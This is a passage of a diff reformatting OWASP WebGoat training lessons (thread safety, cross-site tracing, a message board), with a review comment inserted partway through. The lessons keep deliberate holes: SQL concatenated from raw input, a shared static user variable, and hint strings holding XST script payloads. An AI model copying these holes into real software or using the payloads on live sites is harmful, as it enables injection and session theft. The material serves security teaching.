+ TextArea ta = new TextArea(MESSAGE, 5, 60);
+ item2.addElement(ta);
+ row2.addElement(item2);
 t.addElement(row1);
-
- String messageData = results.getString(MESSAGE_COL);
- TR row2 = new TR(new TD(new B(new StringElement("Message:"))));
- row2.addElement(new TD(new StringElement(messageData)));
 t.addElement(row2);
- // Edited by Chuck Willis - added display of the user who posted the message, so that
- // if users use a cross site request forgery or XSS to make another user post a message,
- // they can see that the message is attributed to that user
+ Element b = ECSFactory.makeButton("Submit");
+ ElementContainer ec = new ElementContainer();
+ ec.addElement(t);
+ ec.addElement(new P().addElement(b));
- TR row3 = new TR(new TD(new StringElement("Posted By:")));
- row3.addElement(new TD(new StringElement(results
- .getString(USER_COL))));
- t.addElement(row3);
+ return (ec);
+ }
+ /**
+ * Description of the Method
+ *
+ * @param s
+ * Description of the Parameter
+ * @return Description of the Return Value
+ */
+ public static Element makeList(WebSession s)
+ {
+ Table t = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(0);
+
+ try
+ {
+ Connection connection = DatabaseUtilities.getConnection(s);
+
+ Statement statement = connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+ ResultSet.CONCUR_READ_ONLY);
+ // edit by Chuck Willis - Added logic to associate similar usernames
+ // The idea is that users chuck-1, chuck-2, etc will see each other's messages
+ // but not anyone elses. This allows users to try out XSS to grab another user's
+ // cookies, but not get confused by other users scripts
+
+ ResultSet results = statement.executeQuery(STANDARD_QUERY + " WHERE user_name LIKE '"
+ + getNameroot(s.getUserName()) + "%'");
+
+ if ((results != null) && (results.first() == true))
+ {
+ results.beforeFirst();
+
+ for (int i = 0; results.next(); i++)
+ {
+ A a = ECSFactory.makeLink(results.getString(TITLE_COL), NUMBER, results.getInt(NUM_COL));
+ TD td = new TD().addElement(a);
+ TR tr = new TR().addElement(td);
+ t.addElement(tr);
+ }
+ }
+ } catch (Exception e)
+ {
+ s.setMessage("Error while getting message list.");
+ }
+
+ ElementContainer ec = new ElementContainer();
+ ec.addElement(new H1("Message List"));
 ec.addElement(t);
- // Some sanity checks that the script may be correct
- if (messageData.toLowerCase().indexOf("") != -1
- && messageData.toLowerCase().indexOf("alert") != -1)
+ return (ec);
+ }
+
+ private static String getNameroot(String name)
+ {
+ String nameroot = name;
+ if (nameroot.indexOf('-') != -1)
 {
- makeSuccess(s);
+ nameroot = nameroot.substring(0, nameroot.indexOf('-'));
 }
-
- }
- else
- {
- if (messageNum != 0)
- {
- ec.addElement(new P().addElement("Could not find message "
- + messageNum));
- }
- }
+ return nameroot;
 }
- catch (Exception e)
+
+ public Element getCredits()
 {
- s.setMessage("Error generating " + this.getClass().getName());
- e.printStackTrace();
+ return super.getCustomCredits("", ASPECT_LOGO);
 }
-
- return (ec);
- }
-
-
- /**
- * Description of the Method
- *
- * @param s Description of the Parameter
- * @return Description of the Return Value
- */
- protected Element makeInput(WebSession s)
- {
- Table t = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(0);
- TR row1 = new TR();
- TR row2 = new TR();
- row1.addElement(new TD(new StringElement("Title: ")));
-
- Input inputTitle = new Input(Input.TEXT, TITLE, "");
- row1.addElement(new TD(inputTitle));
-
- TD item1 = new TD();
- item1.setVAlign("TOP");
- item1.addElement(new StringElement("Message: "));
- row2.addElement(item1);
-
- TD item2 = new TD();
- TextArea ta = new TextArea(MESSAGE, 5, 60);
- item2.addElement(ta);
- row2.addElement(item2);
- t.addElement(row1);
- t.addElement(row2);
-
- Element b = ECSFactory.makeButton("Submit");
- ElementContainer ec = new ElementContainer();
- ec.addElement(t);
- ec.addElement(new P().addElement(b));
-
- return (ec);
- }
-
-
- /**
- * Description of the Method
- *
- * @param s Description of the Parameter
- * @return Description of the Return Value
- */
- public static Element makeList(WebSession s)
- {
- Table t = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(0);
-
- try
- {
- Connection connection = DatabaseUtilities.getConnection(s);
-
- Statement statement = connection.createStatement(
- ResultSet.TYPE_SCROLL_INSENSITIVE,
- ResultSet.CONCUR_READ_ONLY);
- // edit by Chuck Willis - Added logic to associate similar usernames
- // The idea is that users chuck-1, chuck-2, etc will see each other's messages
- // but not anyone elses. This allows users to try out XSS to grab another user's
- // cookies, but not get confused by other users scripts
-
- ResultSet results = statement.executeQuery(STANDARD_QUERY
- + " WHERE user_name LIKE '" + getNameroot(s.getUserName())
- + "%'");
-
- if ((results != null) && (results.first() == true))
- {
- results.beforeFirst();
-
- for (int i = 0; results.next(); i++)
- {
- A a = ECSFactory.makeLink(results.getString(TITLE_COL),
- NUMBER, results.getInt(NUM_COL));
- TD td = new TD().addElement(a);
- TR tr = new TR().addElement(td);
- t.addElement(tr);
- }
- }
- }
- catch (Exception e)
- {
- s.setMessage("Error while getting message list.");
- }
-
- ElementContainer ec = new ElementContainer();
- ec.addElement(new H1("Message List"));
- ec.addElement(t);
-
- return (ec);
- }
-
-
- private static String getNameroot(String name)
- {
- String nameroot = name;
- if (nameroot.indexOf('-') != -1)
- {
- nameroot = nameroot.substring(0, nameroot.indexOf('-'));
- }
- return nameroot;
- }
-
- public Element getCredits()
- {
- return super.getCustomCredits("", ASPECT_LOGO);
- }
 }
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/ThreadSafetyProblem.java b/main/project/JavaSource/org/owasp/webgoat/lessons/ThreadSafetyProblem.java
index 6c1723d2e..01d77415d 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/ThreadSafetyProblem.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/ThreadSafetyProblem.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.lessons;
 
 import java.sql.Connection;
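Review bot: In addMessage's catch block, `e.getMessage().indexOf("No ResultSet was produced")` dereferences a message that can be null (a NullPointerException and many driver exceptions carry none), so the NPE escapes the catch and, because createContent calls addMessage first, the whole lesson page fails instead of showing "Could not add message to database". Guard it with `String msg = e.getMessage();` and `if (msg == null || msg.indexOf("No ResultSet was produced") == -1)`. Separately, makeList concatenates `getNameroot(s.getUserName())` into STANDARD_QUERY while makeCurrent binds the same LIKE pattern through a PreparedStatement; the user name is session data rather than lesson input, so the two should use the same bound form (note that `%` and `_` in a name act as LIKE wildcards either way). The message number comes from `private static int count = 1;` via `count++`, which is shared across all sessions without synchronization and restarts at 1 on every redeploy, so if `num` is a key in `messages` inserts will collide after a restart unless the table is rebuilt — worth confirming.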
@@ -13,203 +14,188 @@ import org.apache.ecs.html.IMG; import org.apache.ecs.html.Input; import org.apache.ecs.html.P; import org.apache.ecs.html.A; - import org.owasp.webgoat.session.*; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ - * - * @author Jeff Williams Aspect Security - * @created October 28, 2003 + * + * @author Jeff Williams Aspect Security + * @created October 28, 2003 */ public class ThreadSafetyProblem extends LessonAdapter { - public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0)); - - private final static String USER_NAME = "username"; + public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com") + .addElement( + new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0) + .setVspace(0)); - private static String currentUser; + private final static String USER_NAME = "username"; - private String originalUser; + private static String currentUser; + private String originalUser; - /** - * Description of the Method - * - * @param s Description of the Parameter - * @return Description of the Return Value - */ - protected Element createContent(WebSession s) - { - ElementContainer ec = new ElementContainer(); - - try + /** + * Description of the Method + * + * @param s + * Description of the Parameter + * @return Description of the Return Value + */ + protected Element createContent(WebSession s) { - Connection connection = DatabaseUtilities.getConnection(s); + ElementContainer ec = new ElementContainer(); - ec.addElement(new StringElement("Enter user name: ")); - 
ec.addElement(new Input(Input.TEXT, USER_NAME, "")); - currentUser = s.getParser().getRawParameter(USER_NAME, ""); - originalUser = currentUser; - - // Store the user name - String user1 = new String(currentUser); - - Element b = ECSFactory.makeButton("Submit"); - ec.addElement(b); - ec.addElement(new P()); - - if (!"".equals(currentUser)) - { - Thread.sleep(1500); - - // Get the users info from the DB - String query = "SELECT * FROM user_system_data WHERE user_name = '" - + currentUser + "'"; - Statement statement = connection.createStatement( - ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - ResultSet results = statement.executeQuery(query); - - if ((results != null) && (results.first() == true)) + try { - ec.addElement("Account information for user: " - + originalUser + "

"); - ResultSetMetaData resultsMetaData = results.getMetaData(); - ec.addElement(DatabaseUtilities.writeTable(results, - resultsMetaData)); - } - else + Connection connection = DatabaseUtilities.getConnection(s); + + ec.addElement(new StringElement("Enter user name: ")); + ec.addElement(new Input(Input.TEXT, USER_NAME, "")); + currentUser = s.getParser().getRawParameter(USER_NAME, ""); + originalUser = currentUser; + + // Store the user name + String user1 = new String(currentUser); + + Element b = ECSFactory.makeButton("Submit"); + ec.addElement(b); + ec.addElement(new P()); + + if (!"".equals(currentUser)) + { + Thread.sleep(1500); + + // Get the users info from the DB + String query = "SELECT * FROM user_system_data WHERE user_name = '" + currentUser + "'"; + Statement statement = connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, + ResultSet.CONCUR_READ_ONLY); + ResultSet results = statement.executeQuery(query); + + if ((results != null) && (results.first() == true)) + { + ec.addElement("Account information for user: " + originalUser + "

"); + ResultSetMetaData resultsMetaData = results.getMetaData(); + ec.addElement(DatabaseUtilities.writeTable(results, resultsMetaData)); + } + else + { + s.setMessage("'" + currentUser + "' is not a user in the WebGoat database."); + } + } + if (!user1.equals(currentUser)) + { + makeSuccess(s); + } + + } catch (Exception e) { - s.setMessage("'" + currentUser - + "' is not a user in the WebGoat database."); + s.setMessage("Error generating " + this.getClass().getName()); + e.printStackTrace(); } - } - if (!user1.equals(currentUser)) - { - makeSuccess(s); - } + return (ec); } - catch (Exception e) + + /** + * Gets the hints attribute of the ConcurrencyScreen object + * + * @return The hints value + */ + protected List getHints(WebSession s) { - s.setMessage("Error generating " + this.getClass().getName()); - e.printStackTrace(); + List hints = new ArrayList(); + hints.add("Web applications handle many HTTP requests at the same time."); + hints.add("Developers use variables that are not thread safe."); + hints.add("Show the Java source code and trace the 'currentUser' variable"); + hints.add("Open two browsers and send 'jeff' in one and 'dave' in the other."); + + return hints; } - return (ec); - } - - - /** - * Gets the hints attribute of the ConcurrencyScreen object - * - * @return The hints value - */ - protected List getHints(WebSession s) - { - List hints = new ArrayList(); - hints - .add("Web applications handle many HTTP requests at the same time."); - hints.add("Developers use variables that are not thread safe."); - hints - .add("Show the Java source code and trace the 'currentUser' variable"); - hints - .add("Open two browsers and send 'jeff' in one and 'dave' in the other."); - - return hints; - } - - - /** - * Gets the instructions attribute of the ThreadSafetyProblem object - * - * @return The instructions value - */ - public String getInstructions(WebSession s) - { - - String instructions = "The user should be able to exploit the concurrency error in 
this web application " - + "and view login information for another user that is attempting the same function " - + "at the same time. This will require the use of two browsers. Valid user " - + "names are 'jeff' and 'dave'." - + "

Please enter your username to access your account."; - - return (instructions); - } - - private final static Integer DEFAULT_RANKING = new Integer(80); - - - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } - - - protected Category getDefaultCategory() - { - return Category.CONCURRENCY; - } - - - /** - * Gets the title attribute of the ConcurrencyScreen object - * - * @return The title value - */ - public String getTitle() - { - return ("Thread Safety Problems"); - } - - - /** - * Constructor for the ConcurrencyScreen object - * - * @param s Description of the Parameter - */ - public void handleRequest(WebSession s) - { - try + /** + * Gets the instructions attribute of the ThreadSafetyProblem object + * + * @return The instructions value + */ + public String getInstructions(WebSession s) { - super.handleRequest(s); + + String instructions = "The user should be able to exploit the concurrency error in this web application " + + "and view login information for another user that is attempting the same function " + + "at the same time. This will require the use of two browsers. Valid user " + + "names are 'jeff' and 'dave'." + "

Please enter your username to access your account."; + + return (instructions); } - catch (Exception e) + + private final static Integer DEFAULT_RANKING = new Integer(80); + + protected Integer getDefaultRanking() { - System.out.println("Exception caught: " + e); - e.printStackTrace(System.out); + return DEFAULT_RANKING; + } + + protected Category getDefaultCategory() + { + return Category.CONCURRENCY; + } + + /** + * Gets the title attribute of the ConcurrencyScreen object + * + * @return The title value + */ + public String getTitle() + { + return ("Thread Safety Problems"); + } + + /** + * Constructor for the ConcurrencyScreen object + * + * @param s + * Description of the Parameter + */ + public void handleRequest(WebSession s) + { + try + { + super.handleRequest(s); + } catch (Exception e) + { + System.out.println("Exception caught: " + e); + e.printStackTrace(System.out); + } + } + + public Element getCredits() + { + return super.getCustomCredits("", ASPECT_LOGO); } - } - - public Element getCredits() - { - return super.getCustomCredits("", ASPECT_LOGO); - } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/TraceXSS.java b/main/project/JavaSource/org/owasp/webgoat/lessons/TraceXSS.java index 5202afafb..9640d8b3e 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/TraceXSS.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/TraceXSS.java @@ -1,9 +1,9 @@ + package org.owasp.webgoat.lessons; import java.util.ArrayList; import java.util.List; import java.util.regex.Pattern; - import org.apache.ecs.Element; import org.apache.ecs.ElementContainer; import org.apache.ecs.html.BR; 
@@ -19,268 +19,239 @@ import org.owasp.webgoat.session.ECSFactory; import org.owasp.webgoat.session.WebSession; import org.owasp.webgoat.util.HtmlEncoder; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ - * - * @author Bruce Mayhew WebGoat - * @created October 28, 2003 + * + * @author Bruce Mayhew WebGoat + * @created October 28, 2003 */ public class TraceXSS extends LessonAdapter { - /** - * Description of the Method - * - * @param s Description of the Parameter - * @return Description of the Return Value - */ + /** + * Description of the Method + * + * @param s + * Description of the Parameter + * @return Description of the Return Value + */ - protected Element createContent(WebSession s) - { - - ElementContainer ec = new ElementContainer(); - String regex1 = "^[0-9]{3}$";// any three digits - Pattern pattern1 = Pattern.compile(regex1); - - try + protected Element createContent(WebSession s) { - String param1 = s.getParser().getRawParameter("field1", "111"); - String param2 = HtmlEncoder.encode(s.getParser().getRawParameter( - "field2", "4128 3214 0002 1999")); - float quantity = 1.0f; - float total = 0.0f; - float runningTotal = 0.0f; - // test input field1 - if (!pattern1.matcher(param1).matches()) - { - if (param1.toLowerCase().indexOf("script") != -1 - && param1.toLowerCase().indexOf("trace") != -1) + ElementContainer ec = new ElementContainer(); + String regex1 = "^[0-9]{3}$";// any three digits + Pattern pattern1 = Pattern.compile(regex1); + + try { - makeSuccess(s); + String param1 = s.getParser().getRawParameter("field1", "111"); + String param2 = HtmlEncoder.encode(s.getParser().getRawParameter("field2", "4128 3214 0002 1999")); + 
float quantity = 1.0f; + float total = 0.0f; + float runningTotal = 0.0f; + + // test input field1 + if (!pattern1.matcher(param1).matches()) + { + if (param1.toLowerCase().indexOf("script") != -1 && param1.toLowerCase().indexOf("trace") != -1) + { + makeSuccess(s); + } + + s.setMessage("Whoops! You entered " + param1 + " instead of your three digit code. Please try again."); + } + + // FIXME: encode output of field2, then s.setMessage( field2 ); + + ec.addElement(new HR().setWidth("90%")); + ec.addElement(new Center().addElement(new H1().addElement("Shopping Cart "))); + Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%").setAlign("center"); + + if (s.isColor()) + { + t.setBorder(1); + } + + TR tr = new TR(); + tr.addElement(new TH().addElement("Shopping Cart Items -- To Buy Now").setWidth("80%")); + tr.addElement(new TH().addElement("Price").setWidth("10%")); + tr.addElement(new TH().addElement("Quantity").setWidth("3%")); + tr.addElement(new TH().addElement("Total").setWidth("7%")); + t.addElement(tr); + + tr = new TR(); + tr.addElement(new TD().addElement("Studio RTA - Laptop/Reading Cart with Tilting Surface - Cherry ")); + tr.addElement(new TD().addElement("69.99").setAlign("right")); + tr.addElement(new TD().addElement( + new Input(Input.TEXT, "QTY1", s.getParser().getStringParameter("QTY1", + "1"))) + .setAlign("right")); + quantity = s.getParser().getFloatParameter("QTY1", 1.0f); + total = quantity * 69.99f; + runningTotal += total; + tr.addElement(new TD().addElement("$" + total)); + t.addElement(tr); + tr = new TR(); + tr.addElement(new TD().addElement("Dynex - Traditional Notebook Case")); + tr.addElement(new TD().addElement("27.99").setAlign("right")); + tr.addElement(new TD().addElement( + new Input(Input.TEXT, "QTY2", s.getParser().getStringParameter("QTY2", + "1"))) + .setAlign("right")); + quantity = s.getParser().getFloatParameter("QTY2", 1.0f); + total = quantity * 27.99f; + runningTotal += total; + 
tr.addElement(new TD().addElement("$" + total)); + t.addElement(tr); + tr = new TR(); + tr.addElement(new TD().addElement("Hewlett-Packard - Pavilion Notebook with Intel® Centrino™")); + tr.addElement(new TD().addElement("1599.99").setAlign("right")); + tr.addElement(new TD().addElement( + new Input(Input.TEXT, "QTY3", s.getParser().getStringParameter("QTY3", + "1"))) + .setAlign("right")); + quantity = s.getParser().getFloatParameter("QTY3", 1.0f); + total = quantity * 1599.99f; + runningTotal += total; + tr.addElement(new TD().addElement("$" + total)); + t.addElement(tr); + tr = new TR(); + tr.addElement(new TD().addElement("3 - Year Performance Service Plan $1000 and Over ")); + tr.addElement(new TD().addElement("299.99").setAlign("right")); + + tr.addElement(new TD().addElement( + new Input(Input.TEXT, "QTY4", s.getParser().getStringParameter("QTY4", + "1"))) + .setAlign("right")); + quantity = s.getParser().getFloatParameter("QTY4", 1.0f); + total = quantity * 299.99f; + runningTotal += total; + tr.addElement(new TD().addElement("$" + total)); + t.addElement(tr); + + ec.addElement(t); + + t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center"); + + if (s.isColor()) + { + t.setBorder(1); + } + + ec.addElement(new BR()); + + tr = new TR(); + tr.addElement(new TD().addElement("The total charged to your credit card:")); + tr.addElement(new TD().addElement("$" + runningTotal)); + tr.addElement(new TD().addElement(ECSFactory.makeButton("Update Cart"))); + t.addElement(tr); + tr = new TR(); + tr.addElement(new TD().addElement(" ").setColSpan(2)); + t.addElement(tr); + tr = new TR(); + tr.addElement(new TD().addElement("Enter your credit card number:")); + tr.addElement(new TD().addElement(new Input(Input.TEXT, "field2", param2))); + t.addElement(tr); + tr = new TR(); + tr.addElement(new TD().addElement("Enter your three digit access code:")); + tr.addElement(new TD().addElement(new Input(Input.TEXT, "field1", param1))); + 
t.addElement(tr); + + Element b = ECSFactory.makeButton("Purchase"); + tr = new TR(); + tr.addElement(new TD().addElement(b).setColSpan(2).setAlign("center")); + t.addElement(tr); + + ec.addElement(t); + ec.addElement(new BR()); + ec.addElement(new HR().setWidth("90%")); + } catch (Exception e) + { + s.setMessage("Error generating " + this.getClass().getName()); + e.printStackTrace(); } - - s - .setMessage("Whoops! You entered " - + param1 - + " instead of your three digit code. Please try again."); - } - - // FIXME: encode output of field2, then s.setMessage( field2 ); - - ec.addElement(new HR().setWidth("90%")); - ec.addElement(new Center().addElement(new H1() - .addElement("Shopping Cart "))); - Table t = new Table().setCellSpacing(0).setCellPadding(2) - .setBorder(1).setWidth("90%").setAlign("center"); - - if (s.isColor()) - { - t.setBorder(1); - } - - TR tr = new TR(); - tr.addElement(new TH().addElement( - "Shopping Cart Items -- To Buy Now").setWidth("80%")); - tr.addElement(new TH().addElement("Price").setWidth("10%")); - tr.addElement(new TH().addElement("Quantity").setWidth("3%")); - tr.addElement(new TH().addElement("Total").setWidth("7%")); - t.addElement(tr); - - tr = new TR(); - tr - .addElement(new TD() - .addElement("Studio RTA - Laptop/Reading Cart with Tilting Surface - Cherry ")); - tr.addElement(new TD().addElement("69.99").setAlign("right")); - tr.addElement(new TD().addElement( - new Input(Input.TEXT, "QTY1", s.getParser() - .getStringParameter("QTY1", "1"))) - .setAlign("right")); - quantity = s.getParser().getFloatParameter("QTY1", 1.0f); - total = quantity * 69.99f; - runningTotal += total; - tr.addElement(new TD().addElement("$" + total)); - t.addElement(tr); - tr = new TR(); - tr.addElement(new TD() - .addElement("Dynex - Traditional Notebook Case")); - tr.addElement(new TD().addElement("27.99").setAlign("right")); - tr.addElement(new TD().addElement( - new Input(Input.TEXT, "QTY2", s.getParser() - .getStringParameter("QTY2", "1"))) - 
.setAlign("right")); - quantity = s.getParser().getFloatParameter("QTY2", 1.0f); - total = quantity * 27.99f; - runningTotal += total; - tr.addElement(new TD().addElement("$" + total)); - t.addElement(tr); - tr = new TR(); - tr - .addElement(new TD() - .addElement("Hewlett-Packard - Pavilion Notebook with Intel® Centrino™")); - tr.addElement(new TD().addElement("1599.99").setAlign("right")); - tr.addElement(new TD().addElement( - new Input(Input.TEXT, "QTY3", s.getParser() - .getStringParameter("QTY3", "1"))) - .setAlign("right")); - quantity = s.getParser().getFloatParameter("QTY3", 1.0f); - total = quantity * 1599.99f; - runningTotal += total; - tr.addElement(new TD().addElement("$" + total)); - t.addElement(tr); - tr = new TR(); - tr - .addElement(new TD() - .addElement("3 - Year Performance Service Plan $1000 and Over ")); - tr.addElement(new TD().addElement("299.99").setAlign("right")); - - tr.addElement(new TD().addElement( - new Input(Input.TEXT, "QTY4", s.getParser() - .getStringParameter("QTY4", "1"))) - .setAlign("right")); - quantity = s.getParser().getFloatParameter("QTY4", 1.0f); - total = quantity * 299.99f; - runningTotal += total; - tr.addElement(new TD().addElement("$" + total)); - t.addElement(tr); - - ec.addElement(t); - - t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0) - .setWidth("90%").setAlign("center"); - - if (s.isColor()) - { - t.setBorder(1); - } - - ec.addElement(new BR()); - - tr = new TR(); - tr.addElement(new TD() - .addElement("The total charged to your credit card:")); - tr.addElement(new TD().addElement("$" + runningTotal)); - tr.addElement(new TD().addElement(ECSFactory - .makeButton("Update Cart"))); - t.addElement(tr); - tr = new TR(); - tr.addElement(new TD().addElement(" ").setColSpan(2)); - t.addElement(tr); - tr = new TR(); - tr - .addElement(new TD() - .addElement("Enter your credit card number:")); - tr.addElement(new TD().addElement(new Input(Input.TEXT, "field2", - param2))); - t.addElement(tr); - tr = 
new TR(); - tr.addElement(new TD() - .addElement("Enter your three digit access code:")); - tr.addElement(new TD().addElement(new Input(Input.TEXT, "field1", - param1))); - t.addElement(tr); - - Element b = ECSFactory.makeButton("Purchase"); - tr = new TR(); - tr.addElement(new TD().addElement(b).setColSpan(2).setAlign( - "center")); - t.addElement(tr); - - ec.addElement(t); - ec.addElement(new BR()); - ec.addElement(new HR().setWidth("90%")); + return (ec); } - catch (Exception e) + + /** + * DOCUMENT ME! + * + * @return DOCUMENT ME! + */ + protected Category getDefaultCategory() { - s.setMessage("Error generating " + this.getClass().getName()); - e.printStackTrace(); + return Category.XSS; } - return (ec); - } + /** + * Gets the hints attribute of the AccessControlScreen object + * + * @return The hints value + */ + protected List getHints(WebSession s) + { + List hints = new ArrayList(); + hints.add("Most web servers support GET/POST. Many default installations also support TRACE"); + hints.add("JavaScript has the ability to post a URL:
" + + "<script type=\"text/javascript\">if ( navigator.appName.indexOf(\"Microsoft\") !=-1)" + + " {var xmlHttp = new ActiveXObject(\"Microsoft.XMLHTTP\");xmlHttp.open(\"GET\", \"./\", false);" + + " xmlHttp.send();str1=xmlHttp.responseText; " + "document.write(str1);</script>"); + hints.add("Try changing the HTTP GET to a HTTP TRACE"); + hints + .add("Try a cross site trace (XST) Command:
" + + "<script type=\"text/javascript\">if ( navigator.appName.indexOf(\"Microsoft\") !=-1)" + + " {var xmlHttp = new ActiveXObject(\"Microsoft.XMLHTTP\");xmlHttp.open(\"TRACE\", \"./\", false);" + + " xmlHttp.send();str1=xmlHttp.responseText; while (str1.indexOf(\"\\n\") > -1) str1 = str1.replace(\"\\n\",\"<br>\"); " + + "document.write(str1);}</script>"); + return hints; + } - /** - * DOCUMENT ME! - * - * @return DOCUMENT ME! - */ - protected Category getDefaultCategory() - { - return Category.XSS; - } + // + private final static Integer DEFAULT_RANKING = new Integer(130); - /** - * Gets the hints attribute of the AccessControlScreen object - * - * @return The hints value - */ - protected List getHints(WebSession s) - { - List hints = new ArrayList(); - hints - .add("Most web servers support GET/POST. Many default installations also support TRACE"); - hints - .add("JavaScript has the ability to post a URL:
" - + "<script type=\"text/javascript\">if ( navigator.appName.indexOf(\"Microsoft\") !=-1)" - + " {var xmlHttp = new ActiveXObject(\"Microsoft.XMLHTTP\");xmlHttp.open(\"GET\", \"./\", false);" - + " xmlHttp.send();str1=xmlHttp.responseText; " - + "document.write(str1);</script>"); - hints.add("Try changing the HTTP GET to a HTTP TRACE"); - hints - .add("Try a cross site trace (XST) Command:
" - + "<script type=\"text/javascript\">if ( navigator.appName.indexOf(\"Microsoft\") !=-1)" - + " {var xmlHttp = new ActiveXObject(\"Microsoft.XMLHTTP\");xmlHttp.open(\"TRACE\", \"./\", false);" - + " xmlHttp.send();str1=xmlHttp.responseText; while (str1.indexOf(\"\\n\") > -1) str1 = str1.replace(\"\\n\",\"<br>\"); " - + "document.write(str1);}</script>"); - return hints; - } + protected Integer getDefaultRanking() + { + return DEFAULT_RANKING; + } - // - - private final static Integer DEFAULT_RANKING = new Integer(130); - - - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } - - - /** - * Gets the title attribute of the AccessControlScreen object - * - * @return The title value - */ - public String getTitle() - { - return ("Cross Site Tracing (XST) Attacks"); - } + /** + * Gets the title attribute of the AccessControlScreen object + * + * @return The title value + */ + public String getTitle() + { + return ("Cross Site Tracing (XST) Attacks"); + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/UncheckedEmail.java b/main/project/JavaSource/org/owasp/webgoat/lessons/UncheckedEmail.java index 75b9036fd..fb63dcba8 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/UncheckedEmail.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/UncheckedEmail.java @@ -1,3 +1,4 @@ + package org.owasp.webgoat.lessons; import java.text.Format; @@ -7,7 +8,6 @@ import java.util.Arrays; import java.util.Date; import java.util.List; import java.util.Properties; - import javax.mail.Message; import javax.mail.MessagingException; import javax.mail.PasswordAuthentication; @@ -15,7 +15,6 @@ import javax.mail.Session; import javax.mail.Transport; import javax.mail.internet.InternetAddress; import javax.mail.internet.MimeMessage; - import org.apache.ecs.Element; import org.apache.ecs.ElementContainer; import org.apache.ecs.StringElement; 
@@ -34,32 +33,31 @@ import org.apache.ecs.html.TextArea; import org.owasp.webgoat.session.ECSFactory; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of 